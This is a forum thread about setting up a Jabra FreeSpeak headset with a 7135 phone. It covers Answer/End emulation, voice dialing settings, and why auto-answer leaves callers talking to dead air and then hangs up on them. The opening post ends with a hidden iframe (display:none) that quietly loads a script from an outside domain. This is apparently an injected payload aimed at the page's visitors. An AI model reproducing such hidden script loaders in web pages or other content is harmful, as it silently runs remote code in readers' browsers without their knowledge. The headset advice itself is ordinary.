+ Reply to Thread

Thread: Jabra settings

Jabra settings

I have a Jabra Freespeak and I want to use it w/my 7135. I have read that many folks are doing just that, with success. I tried and maybe I'm doing something wrong. What settings are you using on the phone to make it work? How does the operation go? How are you using voice dial etc. TIA<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Jabra settings

Originally posted by Lars1
    I have a Jabra Freespeak and I want to use it w/my 7135. I have read that many folks are doing just that, with success. I tried and maybe I'm doing something wrong. What settings are you using on the phone to make it work? How does the operation go? How are you using voice dial etc. TIA
    I use voice dial, but not voice answer.

You need to enable Answer/End emulation on the freespeak. Instructions here: http://www.jabra.com/fscs/NBFreeSpea...dFeatures.html

(although the site appears down right now...)

To place a call, hit the answer/end button, The Freespeak will come out of suspend, and you will be prompted to say the name. Hit it again to hang up.

For receiving calls, leave the FreeSpeak in suspend. In prefs_phone, on the Accesory page, check "Play alert through speaker when headset is plugged in" and on the Voice Dialing page, uncheck Voice Answer. When the phone rings, hit the answer/end button and the freeskpeak will come out of suspend and answer the call. Hit the button again to hang up and return to suspend.

Alan

Thanks, do you have the phone set to auto-answer? Is this selection under Phone prefs/accessories/Car auto-answer, or is it somewhere else.

Thanks again

Originally posted by Lars1
    Thanks, do you have the phone set to auto-answer? Is this selection under Phone prefs/accessories/Car auto-answer, or is it somewhere else.

Thanks again
    No.... auto-Answer would be a BAD thinng with the Jabra, because the phone would be answering while the headset was in standby, leaving your caller talking to dead air, and then when you hit the button to turn on the headset, the phone would treat it as an END call request, disconnecting your caller.

Alan